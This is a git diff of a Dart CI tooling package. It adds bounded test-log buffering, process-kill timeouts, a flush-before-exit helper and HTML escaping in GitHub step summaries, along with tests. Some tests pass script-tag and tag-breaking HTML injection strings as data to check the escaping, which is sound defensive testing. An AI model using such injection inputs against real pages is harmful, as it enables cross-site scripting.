}} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -242,7 +242,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ~/.pub-cache + path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -333,7 +333,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ~/.pub-cache + path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -438,7 +438,7 @@ jobs: - name: Cache Dart pub uses: actions/cache@v5.0.3 with: - path: ~/.pub-cache + path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-pub-${{ hashFiles('**/pubspec.lock') }} restore-keys: ${{ runner.os }}-pub- @@ -538,7 +538,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ~/.pub-cache + path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -679,7 +679,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ~/.pub-cache + path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- @@ -805,7 +805,7 @@ jobs: - name: Cache Dart pub dependencies uses: actions/cache@v5.0.3 with: - path: ~/.pub-cache + path: ${{ runner.os == 'Windows' && format('{0}/Pub/Cache', env.LOCALAPPDATA) || '~/.pub-cache' }} key: ${{ runner.os }}-dart-pub-${{ hashFiles('**/pubspec.yaml') }} restore-keys: ${{ runner.os }}-dart-pub- diff --git a/.runtime_ci/template_versions.json b/.runtime_ci/template_versions.json index 627b907..2e01001 100644 --- a/.runtime_ci/template_versions.json +++ b/.runtime_ci/template_versions.json @@ -1,6 +1,6 @@ { "tooling_version": "0.14.0", - "updated_at": "2026-02-25T01:44:16.353491Z", + "updated_at": "2026-02-25T02:11:44.094948Z", "templates": { "gemini_settings": { "hash": "93983f49dd2f40d2ed245271854946d8916b8f0698ed2cfaf12058305baa0b08", @@ -23,19 +23,19 @@ "updated_at": "2026-02-24T00:59:57.620091Z" }, "workflow_ci": { - "hash": "d12b15077608ffdd3b92b21c0a7df520ea38278c0816b82e5925564678e3c59f", - "consumer_hash": "20eb207d18e17e6bb84ce1b19908e8bdca2bf3a26ea8e8c00a09e94c33deb0f2", - "updated_at": "2026-02-25T01:44:16.349990Z" + "hash": "f14e900c3eb2c8ee9472627688881d197b37fb801bea00fffd42fef5a1947081", + "consumer_hash": "b6b79735284de22017f27b042964dc4f51295f36752d2a340c200a27fd1e6465", + "updated_at": "2026-02-25T02:11:44.092566Z" }, "workflow_release": { - "hash": "ed0e8fb331d9c3d8827a71d320408d5ff603dcc1449eb2f6ee20b115469e0bd9", - "consumer_hash": "ed0e8fb331d9c3d8827a71d320408d5ff603dcc1449eb2f6ee20b115469e0bd9", - "updated_at": "2026-02-25T01:44:16.352226Z" + "hash": "b60dc483cf90c271565fffeee74142973884dff0ef9bc4b6a5b93d58d099c80e", + "consumer_hash": "b60dc483cf90c271565fffeee74142973884dff0ef9bc4b6a5b93d58d099c80e", + "updated_at": "2026-02-25T02:11:44.094396Z" }, "workflow_issue_triage": { - "hash": "960012c66f7a59ac16ed89d6c7d34244ef1dd16efb6c0a66244431ad49e0f28e", - "consumer_hash": "960012c66f7a59ac16ed89d6c7d34244ef1dd16efb6c0a66244431ad49e0f28e", - "updated_at": "2026-02-25T01:44:16.353504Z" + "hash": "063f07bbe55d3770d557f87b55d7c778c4d0810e416b47039f603d76620a605b", + "consumer_hash": "063f07bbe55d3770d557f87b55d7c778c4d0810e416b47039f603d76620a605b", + "updated_at": "2026-02-25T02:11:44.094960Z" } } } diff --git a/bin/manage_cicd.dart b/bin/manage_cicd.dart index 4a05d3f..16ef966 100644 --- a/bin/manage_cicd.dart +++ b/bin/manage_cicd.dart @@ -1,6 +1,7 @@ import 'dart:io'; import 'package:runtime_ci_tooling/src/cli/manage_cicd_cli.dart'; +import 'package:runtime_ci_tooling/src/cli/utils/exit_util.dart'; Future main(List args) async { final cli = ManageCicdCli(); @@ -8,6 +9,6 @@ Future main(List args) async { await cli.run(args); } on UsageException catch (e) { stderr.writeln(e); - exit(64); + await exitWithCode(64); } } diff --git a/lib/src/cli/commands/test_command.dart b/lib/src/cli/commands/test_command.dart index cf13209..7c9b602 100644 --- a/lib/src/cli/commands/test_command.dart +++ b/lib/src/cli/commands/test_command.dart @@ -6,6 +6,7 @@ import 'package:args/command_runner.dart'; import 'package:path/path.dart' as p; import '../../triage/utils/config.dart'; +import '../utils/exit_util.dart'; import '../utils/logger.dart'; import '../utils/repo_utils.dart'; import '../utils/step_summary.dart'; @@ -25,6 +26,10 @@ import '../utils/sub_package_utils.dart'; /// All log files are written to `$TEST_LOG_DIR` (set by CI template) or /// `/.dart_tool/test-logs/` locally. class TestCommand extends Command { + /// Maximum bytes to buffer per stdout/stderr stream to prevent OOM. + static const int _maxLogBufferBytes = 2 * 1024 * 1024; // 2MB + /// Maximum bytes for pub get output (typically small). + static const int _maxPubGetBufferBytes = 512 * 1024; // 512KB @override final String name = 'test'; @@ -36,9 +41,14 @@ class TestCommand extends Command { final repoRoot = RepoUtils.findRepoRoot(); if (repoRoot == null) { Logger.error('Could not find ${config.repoName} repo root.'); - exit(1); + await exitWithCode(1); } + await runWithRoot(repoRoot); + } + /// Run tests with an explicit [repoRoot], preserving the contract from + /// manage_cicd when invoked as `manage_cicd test` (CWD may differ from root). + static Future runWithRoot(String repoRoot) async { Logger.header('Running dart test'); const processTimeout = Duration(minutes: 45); @@ -51,10 +61,10 @@ class TestCommand extends Command { RepoUtils.ensureSafeDirectory(logDir); } on StateError catch (e) { Logger.error('$e'); - exit(1); + await exitWithCode(1); } on FileSystemException catch (e) { Logger.error('Cannot use log directory: $e'); - exit(1); + await exitWithCode(1); } Logger.info('Log directory: $logDir'); @@ -88,35 +98,76 @@ class TestCommand extends Command { final process = await Process.start(Platform.resolvedExecutable, testArgs, workingDirectory: repoRoot); // Stream stdout and stderr to console in real-time while capturing + // (byte-bounded to prevent OOM from runaway test output) final stdoutBuf = StringBuffer(); final stderrBuf = StringBuffer(); - - final stdoutSub = process.stdout.transform(utf8.decoder).listen((data) { + var stdoutBytes = 0; + var stderrBytes = 0; + var stdoutTruncated = false; + var stderrTruncated = false; + const truncationSuffix = '\n\n... (output truncated, exceeded 2MB bytes). See console.log for full output.)'; + final truncationBytes = utf8.encode(truncationSuffix).length; + + void onStdout(String data) { stdout.write(data); - stdoutBuf.write(data); - }); - final stderrSub = process.stderr.transform(utf8.decoder).listen((data) { + if (stdoutTruncated) return; + final dataBytes = utf8.encode(data).length; + if (stdoutBytes + dataBytes <= _maxLogBufferBytes) { + stdoutBuf.write(data); + stdoutBytes += dataBytes; + } else { + final remaining = _maxLogBufferBytes - stdoutBytes - truncationBytes; + if (remaining > 0) { + final bytes = utf8.encode(data); + final toTake = bytes.length > remaining ? remaining : bytes.length; + stdoutBuf.write(utf8.decode(bytes.take(toTake).toList(), allowMalformed: true)); + } + stdoutBuf.write(truncationSuffix); + stdoutTruncated = true; + } + } + + void onStderr(String data) { stderr.write(data); - stderrBuf.write(data); - }); + if (stderrTruncated) return; + final dataBytes = utf8.encode(data).length; + if (stderrBytes + dataBytes <= _maxLogBufferBytes) { + stderrBuf.write(data); + stderrBytes += dataBytes; + } else { + final remaining = _maxLogBufferBytes - stderrBytes - truncationBytes; + if (remaining > 0) { + final bytes = utf8.encode(data); + final toTake = bytes.length > remaining ? remaining : bytes.length; + stderrBuf.write(utf8.decode(bytes.take(toTake).toList(), allowMalformed: true)); + } + stderrBuf.write(truncationSuffix); + stderrTruncated = true; + } + } + + final stdoutSub = process.stdout.transform(Utf8Decoder(allowMalformed: true)).listen(onStdout); + final stderrSub = process.stderr.transform(Utf8Decoder(allowMalformed: true)).listen(onStderr); final stdoutDone = stdoutSub.asFuture(); final stderrDone = stderrSub.asFuture(); // Process-level timeout: kill the test process if it exceeds 45 minutes. - final exitCode = await process.exitCode.timeout( - processTimeout, - onTimeout: () { - Logger.error('Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); - process.kill(); // No signal arg — cross-platform safe - return -1; - }, - ); + // On Unix: SIGTERM first, await up to 5s; if still alive, SIGKILL and await. + // On Windows: single kill, then await exit. + int exitCode; + try { + exitCode = await process.exitCode.timeout(processTimeout); + } on TimeoutException { + Logger.error('Test process exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); + exitCode = await _killAndAwaitExit(process); + } try { await Future.wait([stdoutDone, stderrDone]).timeout(const Duration(seconds: 30)); } catch (_) { - // Process killed or streams timed out — cancel subscriptions to avoid leaks + // Process killed or streams timed out + } finally { await stdoutSub.cancel(); await stderrSub.cancel(); } @@ -176,12 +227,19 @@ class TestCommand extends Command { // Ensure dependencies are resolved (sub-packages have independent // pubspec.yaml files that the root `dart pub get` may not cover). - final pubGetResult = Process.runSync( - Platform.resolvedExecutable, - ['pub', 'get'], - workingDirectory: dir, - environment: {'GIT_LFS_SKIP_SMUDGE': '1'}, + // Use Process.start so we can kill on timeout (Process.run would hang). + const pubGetTimeout = Duration(minutes: 5); + final pubGetResult = await _runPubGetWithTimeout( + dir, + pubGetTimeout, + onTimeout: () { + Logger.error(' dart pub get timed out for $name (${pubGetTimeout.inMinutes}-minute limit)'); + }, ); + if (pubGetResult == null) { + failures.add(name); + continue; + } if (pubGetResult.exitCode != 0) { final pubGetStderr = (pubGetResult.stderr as String).trim(); if (pubGetStderr.isNotEmpty) Logger.error(pubGetStderr); @@ -190,21 +248,107 @@ class TestCommand extends Command { continue; } - final spProcess = await Process.start( - Platform.resolvedExecutable, - ['test', '--exclude-tags', 'gcp,integration'], - workingDirectory: dir, - mode: ProcessStartMode.inheritStdio, - ); + final spLogDir = p.join(logDir, name); + Directory(spLogDir).createSync(recursive: true); + final spJsonPath = p.join(spLogDir, 'results.json'); + final spExpandedPath = p.join(spLogDir, 'expanded.txt'); - final spExitCode = await spProcess.exitCode.timeout( - processTimeout, - onTimeout: () { - Logger.error('Test process for $name exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); - spProcess.kill(); // No signal arg — cross-platform safe - return -1; - }, - ); + final spTestArgs = [ + 'test', + '--exclude-tags', + 'gcp,integration', + '--chain-stack-traces', + '--reporter', + 'expanded', + '--file-reporter', + 'json:$spJsonPath', + '--file-reporter', + 'expanded:$spExpandedPath', + ]; + + final spProcess = await Process.start(Platform.resolvedExecutable, spTestArgs, workingDirectory: dir); + + final stdoutBuf = StringBuffer(); + final stderrBuf = StringBuffer(); + var stdoutBytes = 0; + var stderrBytes = 0; + var stdoutTruncated = false; + var stderrTruncated = false; + const spTruncationSuffix = '\n\n... (output truncated, exceeded 2MB bytes). See console.log for full output.)'; + final spTruncationBytes = utf8.encode(spTruncationSuffix).length; + + void onSpStdout(String data) { + stdout.write(data); + if (stdoutTruncated) return; + final dataBytes = utf8.encode(data).length; + if (stdoutBytes + dataBytes <= _maxLogBufferBytes) { + stdoutBuf.write(data); + stdoutBytes += dataBytes; + } else { + final remaining = _maxLogBufferBytes - stdoutBytes - spTruncationBytes; + if (remaining > 0) { + final bytes = utf8.encode(data); + final toTake = bytes.length > remaining ? remaining : bytes.length; + stdoutBuf.write(utf8.decode(bytes.take(toTake).toList(), allowMalformed: true)); + } + stdoutBuf.write(spTruncationSuffix); + stdoutTruncated = true; + } + } + + void onSpStderr(String data) { + stderr.write(data); + if (stderrTruncated) return; + final dataBytes = utf8.encode(data).length; + if (stderrBytes + dataBytes <= _maxLogBufferBytes) { + stderrBuf.write(data); + stderrBytes += dataBytes; + } else { + final remaining = _maxLogBufferBytes - stderrBytes - spTruncationBytes; + if (remaining > 0) { + final bytes = utf8.encode(data); + final toTake = bytes.length > remaining ? remaining : bytes.length; + stderrBuf.write(utf8.decode(bytes.take(toTake).toList(), allowMalformed: true)); + } + stderrBuf.write(spTruncationSuffix); + stderrTruncated = true; + } + } + + final stdoutSub = spProcess.stdout.transform(Utf8Decoder(allowMalformed: true)).listen(onSpStdout); + final stderrSub = spProcess.stderr.transform(Utf8Decoder(allowMalformed: true)).listen(onSpStderr); + + int spExitCode; + try { + spExitCode = await spProcess.exitCode.timeout(processTimeout); + } on TimeoutException { + Logger.error('Test process for $name exceeded ${processTimeout.inMinutes}-minute timeout — killing.'); + spExitCode = await _killAndAwaitExit(spProcess); + } + + try { + await Future.wait([ + stdoutSub.asFuture(), + stderrSub.asFuture(), + ]).timeout(const Duration(seconds: 30)); + } catch (_) { + // Process killed or streams timed out + } finally { + await stdoutSub.cancel(); + await stderrSub.cancel(); + } + + try { + RepoUtils.writeFileSafely(p.join(spLogDir, 'dart_stdout.log'), stdoutBuf.toString()); + if (stderrBuf.isNotEmpty) { + RepoUtils.writeFileSafely(p.join(spLogDir, 'dart_stderr.log'), stderrBuf.toString()); + } + } on FileSystemException catch (e) { + Logger.warn('Could not write sub-package log files: $e'); + } + + final spResults = TestResultsUtil.parseTestResultsJson(spJsonPath); + TestResultsUtil.writeTestJobSummary(spResults, spExitCode, platformId: name); if (spExitCode != 0) { Logger.error('Tests failed for $name (exit code $spExitCode)'); @@ -218,9 +362,90 @@ class TestCommand extends Command { Logger.error('Tests failed for ${failures.length} package(s): ${failures.join(', ')}'); final failureBullets = failures.map((name) => '- `${StepSummary.escapeHtml(name)}`').join('\n'); StepSummary.write('\n## Sub-package Test Failures\n\n$failureBullets\n'); - exit(1); + await exitWithCode(1); } Logger.success('All tests passed'); + await stdout.flush(); + await stderr.flush(); + } + + /// Runs `dart pub get` in [workingDirectory] with [timeout]. Kills the process + /// on timeout to avoid indefinite hangs. Returns null on timeout. + static Future _runPubGetWithTimeout( + String workingDirectory, + Duration timeout, { + void Function()? onTimeout, + }) async { + final process = await Process.start( + Platform.resolvedExecutable, + ['pub', 'get'], + workingDirectory: workingDirectory, + environment: {'GIT_LFS_SKIP_SMUDGE': '1'}, + ); + final stdoutBuf = StringBuffer(); + final stderrBuf = StringBuffer(); + final stdoutBytes = [0]; + final stderrBytes = [0]; + final stdoutTruncated = [false]; + final stderrTruncated = [false]; + const pubGetTruncationSuffix = '\n\n... (output truncated).'; + final pubGetTruncationBytes = utf8.encode(pubGetTruncationSuffix).length; + + void capWrite(StringBuffer buf, String data, int maxBytes, List truncated, List byteCount) { + if (truncated[0]) return; + final dataBytes = utf8.encode(data).length; + if (byteCount[0] + dataBytes <= maxBytes) { + buf.write(data); + byteCount[0] += dataBytes; + } else { + final remaining = maxBytes - byteCount[0] - pubGetTruncationBytes; + if (remaining > 0) { + final bytes = utf8.encode(data); + final toTake = bytes.length > remaining ? remaining : bytes.length; + buf.write(utf8.decode(bytes.take(toTake).toList(), allowMalformed: true)); + } + buf.write(pubGetTruncationSuffix); + truncated[0] = true; + } + } + + final stdoutSub = process.stdout + .transform(Utf8Decoder(allowMalformed: true)) + .listen((data) => capWrite(stdoutBuf, data, _maxPubGetBufferBytes, stdoutTruncated, stdoutBytes)); + final stderrSub = process.stderr + .transform(Utf8Decoder(allowMalformed: true)) + .listen((data) => capWrite(stderrBuf, data, _maxPubGetBufferBytes, stderrTruncated, stderrBytes)); + try { + final exitCode = await process.exitCode.timeout(timeout); + await Future.wait([stdoutSub.cancel(), stderrSub.cancel()]); + return ProcessResult(process.pid, exitCode, stdoutBuf.toString(), stderrBuf.toString()); + } on TimeoutException { + onTimeout?.call(); + await _killAndAwaitExit(process); + try { + await Future.wait([stdoutSub.cancel(), stderrSub.cancel()]); + } catch (_) {} + return null; + } + } + + /// Kills [process] and awaits exit. On Unix: SIGTERM first, wait up to 5s; + /// if still alive, SIGKILL and await. On Windows: single kill, then await. + /// Returns -1 to indicate timeout-induced kill. + static Future _killAndAwaitExit(Process process) async { + if (Platform.isWindows) { + process.kill(); + await process.exitCode; + return -1; + } + process.kill(ProcessSignal.sigterm); + try { + await process.exitCode.timeout(const Duration(seconds: 5)); + } on TimeoutException { + process.kill(ProcessSignal.sigkill); + await process.exitCode; + } + return -1; } } diff --git a/lib/src/cli/manage_cicd.dart b/lib/src/cli/manage_cicd.dart index 69156f9..79dc164 100644 --- a/lib/src/cli/manage_cicd.dart +++ b/lib/src/cli/manage_cicd.dart @@ -2165,8 +2165,8 @@ ${_artifactLink()} /// /// All log files are written to [logDir] (`$TEST_LOG_DIR` in CI, or /// `/.dart_tool/test-logs/` locally). -Future _runTest(String _) async { - await TestCommand().run(); +Future _runTest(String repoRoot) async { + await TestCommand.runWithRoot(repoRoot); } /// Run dart analyze and fail only on actual errors. diff --git a/lib/src/cli/utils/exit_util.dart b/lib/src/cli/utils/exit_util.dart new file mode 100644 index 0000000..0a84322 --- /dev/null +++ b/lib/src/cli/utils/exit_util.dart @@ -0,0 +1,13 @@ +import 'dart:io'; + +/// Flush stdout and stderr before exiting so final messages are not lost. +/// Ignores flush errors (e.g. when running under dart test with captured streams). +Future exitWithCode(int code) async { + try { + await stdout.flush(); + } catch (_) {} + try { + await stderr.flush(); + } catch (_) {} + exit(code); +} diff --git a/lib/src/cli/utils/step_summary.dart b/lib/src/cli/utils/step_summary.dart index 747e571..38f7455 100644 --- a/lib/src/cli/utils/step_summary.dart +++ b/lib/src/cli/utils/step_summary.dart @@ -1,3 +1,4 @@ +import 'dart:convert'; import 'dart:io'; import '../../triage/utils/config.dart'; @@ -12,8 +13,10 @@ abstract final class StepSummary { /// Write a markdown summary to $GITHUB_STEP_SUMMARY (visible in Actions UI). /// No-op when running locally (env var not set). /// Skips appending if the file would exceed the 1 MiB GitHub limit. - static void write(String markdown) { - final summaryFile = Platform.environment['GITHUB_STEP_SUMMARY']; + /// [environment] overrides Platform.environment (for testing). + static void write(String markdown, {Map? environment}) { + final env = environment ?? Platform.environment; + final summaryFile = env['GITHUB_STEP_SUMMARY']; if (summaryFile == null || summaryFile.trim().isEmpty) return; if (RepoUtils.isSymlinkPath(summaryFile)) { Logger.warn('Refusing to write step summary through symlink: $summaryFile'); @@ -21,7 +24,9 @@ abstract final class StepSummary { } final file = File(summaryFile); final currentSize = file.existsSync() ? file.lengthSync() : 0; - if (currentSize + markdown.length > _maxSummaryBytes) { + // Use UTF-8 byte length (not markdown.length) — GitHub limit is 1 MiB. + final markdownBytes = utf8.encode(markdown).length; + if (currentSize + markdownBytes > _maxSummaryBytes) { Logger.warn('Step summary approaching 1 MiB limit — skipping append'); return; } @@ -65,11 +70,16 @@ abstract final class StepSummary { } /// Wrap content in a collapsible
block for step summaries. + /// Escapes title and content to prevent HTML injection (e.g. closing tags like + ///
) from breaking structure or executing unsafe HTML. static String collapsible(String title, String content, {bool open = false}) { if (content.trim().isEmpty) return ''; final openAttr = open ? ' open' : ''; final safeTitle = escapeHtml(title); - return '\n\n$safeTitle\n\n$content\n\n\n'; + // Escape content to prevent , , ', + stackTrace: 'fake', + printOutput: '', + durationMs: 0, ), ); - expect(summary!, isNot(contains('failing test 24'))); + + TestResultsUtil.writeTestJobSummary( + results, + 1, + platformId: 'linux', + writeSummary: (markdown) => summary = markdown, + ); + + expect(summary, isNotNull); + expect(summary!, contains('</details>')); + expect(summary!, contains('<script>')); + expect(summary!, contains('<summary>')); + expect(summary!, isNot(contains(''))); + }); + + test('handles adversarial backtick content in failure output', () { + String? summary; + final results = _parsed(passed: 0, failed: 1, skipped: 0); + results.failures.add( + TestFailure( + name: 'backtick test', + error: '```' * 10 + 'content' + '```' * 10, + stackTrace: '', + printOutput: '', + durationMs: 0, + ), + ); + + TestResultsUtil.writeTestJobSummary( + results, + 1, + platformId: 'linux', + writeSummary: (markdown) => summary = markdown, + ); + + expect(summary, isNotNull); + expect(summary!, contains('### Failed Tests')); + expect(summary!, contains('backtick test')); + // Fence should be longer than content's backticks; output should be valid + expect(summary!.split('```').length, greaterThan(2)); + }); + }); + + group('StepSummary', () { + test('write uses byte size not char size for limit guard', () { + // GitHub step summary limit is 1 MiB; guard must use UTF-8 byte count. + // Multi-byte chars (e.g. 語) have more bytes than chars — old bug used + // markdown.length (chars) and could overflow. + late Directory tempDir; + tempDir = Directory.systemTemp.createTempSync('step_summary_bytes_'); + try { + final summaryPath = p.join(tempDir.path, 'summary.md'); + const maxBytes = (1024 * 1024) - (4 * 1024); + // Fill to maxBytes - 2 so that "語" (3 bytes) would exceed + File(summaryPath).writeAsStringSync('x' * (maxBytes - 2)); + expect(File(summaryPath).lengthSync(), equals(maxBytes - 2)); + + StepSummary.write('語', environment: {'GITHUB_STEP_SUMMARY': summaryPath}); + // Should skip append (would exceed); file size unchanged + expect(File(summaryPath).lengthSync(), equals(maxBytes - 2)); + } finally { + if (tempDir.existsSync()) tempDir.deleteSync(recursive: true); + } + }); + + test('collapsible escapes content to prevent HTML injection', () { + final out = StepSummary.collapsible( + 'Title', + 'Content with and ', + ); + expect(out, contains('</summary>')); + expect(out, contains('<script>')); + expect(out, contains('</details>')); + expect(out, contains('<img')); + expect(out, isNot(contains(''))); + expect(out, contains('
')); + expect(out, contains('
')); }); }); } diff --git a/test/test_command_test.dart b/test/test_command_test.dart new file mode 100644 index 0000000..9a0ab1c --- /dev/null +++ b/test/test_command_test.dart @@ -0,0 +1,97 @@ +import 'dart:io'; + +import 'package:path/path.dart' as p; +import 'package:test/test.dart'; + +import 'package:runtime_ci_tooling/src/cli/commands/test_command.dart'; +import 'package:runtime_ci_tooling/src/cli/utils/test_results_util.dart'; +import 'package:runtime_ci_tooling/src/triage/utils/config.dart'; + +void main() { + group('TestCommand.runWithRoot', () { + late Directory tempDir; + + setUp(() { + tempDir = Directory.systemTemp.createTempSync('test_command_'); + }); + + tearDown(() { + if (tempDir.existsSync()) { + tempDir.deleteSync(recursive: true); + } + }); + + test('skips root tests and succeeds when no test/ directory exists', () async { + // Minimal repo: pubspec with matching name, no test/ + File(p.join(tempDir.path, 'pubspec.yaml')).writeAsStringSync('name: ${config.repoName}\nversion: 0.0.0\n'); + + // Completes without throwing or exit(1); StepSummary.write is no-op when + // GITHUB_STEP_SUMMARY is unset (local runs). + await TestCommand.runWithRoot(tempDir.path); + }); + + test('uses passed repoRoot for log directory resolution', () async { + // Create minimal repo + File(p.join(tempDir.path, 'pubspec.yaml')).writeAsStringSync('name: ${config.repoName}\nversion: 0.0.0\n'); + + await TestCommand.runWithRoot(tempDir.path); + + // Log dir should be under repoRoot when TEST_LOG_DIR is unset + final expectedLogDir = p.join(tempDir.path, '.dart_tool', 'test-logs'); + expect(Directory(expectedLogDir).existsSync(), isTrue); + }); + + test('runs root tests, writes results.json, and StepSummary pathway produces valid output', () async { + // Minimal repo with a passing test to exercise full TestCommand flow + File(p.join(tempDir.path, 'pubspec.yaml')).writeAsStringSync(''' +name: ${config.repoName} +version: 0.0.0 +environment: + sdk: ^3.0.0 +dev_dependencies: + test: ^1.24.0 +'''); + Directory(p.join(tempDir.path, 'test')).createSync(recursive: true); + File(p.join(tempDir.path, 'test', 'passing_test.dart')).writeAsStringSync(''' +import 'package:test/test.dart'; + +void main() { + test('passes', () => expect(1 + 1, equals(2))); +} +'''); + // Resolve dependencies so dart test can run + final pubGet = await Process.run('dart', ['pub', 'get'], workingDirectory: tempDir.path); + expect(pubGet.exitCode, equals(0), reason: 'dart pub get must succeed'); + + await TestCommand.runWithRoot(tempDir.path); + + final logDir = p.join(tempDir.path, '.dart_tool', 'test-logs'); + expect(Directory(logDir).existsSync(), isTrue, reason: 'log dir should be created'); + + // results.json or expanded.txt are written by file reporters + final jsonPath = p.join(logDir, 'results.json'); + final expandedPath = p.join(logDir, 'expanded.txt'); + final hasResults = File(jsonPath).existsSync() || File(expandedPath).existsSync(); + expect(hasResults, isTrue, reason: 'at least one reporter output should exist'); + + // If results.json exists, verify parse + writeTestJobSummary pathway + if (File(jsonPath).existsSync()) { + final results = TestResultsUtil.parseTestResultsJson(jsonPath); + expect(results.parsed, isTrue); + expect(results.passed, greaterThanOrEqualTo(1)); + expect(results.failed, equals(0)); + + String? capturedSummary; + TestResultsUtil.writeTestJobSummary( + results, + 0, + platformId: 'test-runner', + writeSummary: (m) => capturedSummary = m, + ); + expect(capturedSummary, isNotNull); + expect(capturedSummary!, contains('## Test Results — test-runner')); + expect(capturedSummary!, contains('passed')); + } + }); + }); +} diff --git a/test/workflow_generator_test.dart b/test/workflow_generator_test.dart index e00ed8e..a18f086 100644 --- a/test/workflow_generator_test.dart +++ b/test/workflow_generator_test.dart @@ -39,99 +39,65 @@ void main() { // ---- dart_sdk ---- group('dart_sdk', () { test('missing dart_sdk produces error', () { - final errors = WorkflowGenerator.validate({ - 'features': {}, - }); + final errors = WorkflowGenerator.validate({'features': {}}); expect(errors, contains('ci.dart_sdk is required')); }); test('null dart_sdk produces error', () { - final errors = WorkflowGenerator.validate({ - 'dart_sdk': null, - 'features': {}, - }); + final errors = WorkflowGenerator.validate({'dart_sdk': null, 'features': {}}); expect(errors, contains('ci.dart_sdk is required')); }); test('non-string dart_sdk produces error', () { - final errors = WorkflowGenerator.validate({ - 'dart_sdk': 42, - 'features': {}, - }); + final errors = WorkflowGenerator.validate({'dart_sdk': 42, 'features': {}}); expect(errors, anyElement(contains('must be a string'))); }); test('empty-string dart_sdk produces error', () { - final errors = WorkflowGenerator.validate({ - 'dart_sdk': '', - 'features': {}, - }); + final errors = WorkflowGenerator.validate({'dart_sdk': '', 'features': {}}); expect(errors, anyElement(contains('non-empty'))); }); test('whitespace-only dart_sdk produces error', () { - final errors = WorkflowGenerator.validate({ - 'dart_sdk': ' ', - 'features': {}, - }); + final errors = WorkflowGenerator.validate({'dart_sdk': ' ', 'features': {}}); // After trim the string is empty expect(errors, anyElement(contains('non-empty'))); }); test('dart_sdk with leading/trailing whitespace produces error', () { - final errors = WorkflowGenerator.validate({ - 'dart_sdk': ' 3.9.2 ', - 'features': {}, - }); + final errors = WorkflowGenerator.validate({'dart_sdk': ' 3.9.2 ', 'features': {}}); expect(errors, anyElement(contains('whitespace'))); }); test('dart_sdk with trailing newline triggers whitespace error', () { // A trailing \n makes trimmed != sdk, so the whitespace check fires first. - final errors = WorkflowGenerator.validate({ - 'dart_sdk': '3.9.2\n', - 'features': {}, - }); + final errors = WorkflowGenerator.validate({'dart_sdk': '3.9.2\n', 'features': {}}); expect(errors, anyElement(contains('whitespace'))); }); - test( - 'dart_sdk with embedded tab (after trim is identity) triggers newlines/tabs error', - () { - // A tab in the middle: trim() has no effect but the regex catches it. - final errors = WorkflowGenerator.validate({ - 'dart_sdk': '3.9\t.2', - 'features': {}, - }); - expect(errors, anyElement(contains('newlines/tabs'))); - }, - ); + test('dart_sdk with embedded tab (after trim is identity) triggers newlines/tabs error', () { + // A tab in the middle: trim() has no effect but the regex catches it. + final errors = WorkflowGenerator.validate({'dart_sdk': '3.9\t.2', 'features': {}}); + expect(errors, anyElement(contains('newlines/tabs'))); + }); test('valid semver dart_sdk passes', () { - final errors = WorkflowGenerator.validate( - _validConfig(dartSdk: '3.9.2'), - ); + final errors = WorkflowGenerator.validate(_validConfig(dartSdk: '3.9.2')); expect(errors.where((e) => e.contains('dart_sdk')), isEmpty); }); test('valid semver with pre-release passes', () { - final errors = WorkflowGenerator.validate( - _validConfig(dartSdk: '3.10.0-beta.1'), - ); + final errors = WorkflowGenerator.validate(_validConfig(dartSdk: '3.10.0-beta.1')); expect(errors.where((e) => e.contains('dart_sdk')), isEmpty); }); test('channel "stable" passes', () { - final errors = WorkflowGenerator.validate( - _validConfig(dartSdk: 'stable'), - ); + final errors = WorkflowGenerator.validate(_validConfig(dartSdk: 'stable')); expect(errors.where((e) => e.contains('dart_sdk')), isEmpty); }); test('channel "beta" passes', () { - final errors = WorkflowGenerator.validate( - _validConfig(dartSdk: 'beta'), - ); + final errors = WorkflowGenerator.validate(_validConfig(dartSdk: 'beta')); expect(errors.where((e) => e.contains('dart_sdk')), isEmpty); }); @@ -141,9 +107,7 @@ void main() { }); test('invalid dart_sdk like "latest" produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(dartSdk: 'latest'), - ); + final errors = WorkflowGenerator.validate(_validConfig(dartSdk: 'latest')); expect(errors, anyElement(contains('channel'))); }); @@ -161,10 +125,7 @@ void main() { }); test('non-map features produces error', () { - final errors = WorkflowGenerator.validate({ - 'dart_sdk': '3.9.2', - 'features': 'not_a_map', - }); + final errors = WorkflowGenerator.validate({'dart_sdk': '3.9.2', 'features': 'not_a_map'}); expect(errors, anyElement(contains('features must be an object'))); }); @@ -211,16 +172,12 @@ void main() { // ---- platforms ---- group('platforms', () { test('non-list platforms produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(platforms: null)..['platforms'] = 'ubuntu', - ); + final errors = WorkflowGenerator.validate(_validConfig(platforms: null)..['platforms'] = 'ubuntu'); expect(errors, anyElement(contains('platforms must be an array'))); }); test('unknown platform entry produces error', () { - final errors = WorkflowGenerator.validate( - _validConfig(platforms: ['ubuntu', 'solaris']), - ); + final errors = WorkflowGenerator.validate(_validConfig(platforms: ['ubuntu', 'solaris'])); 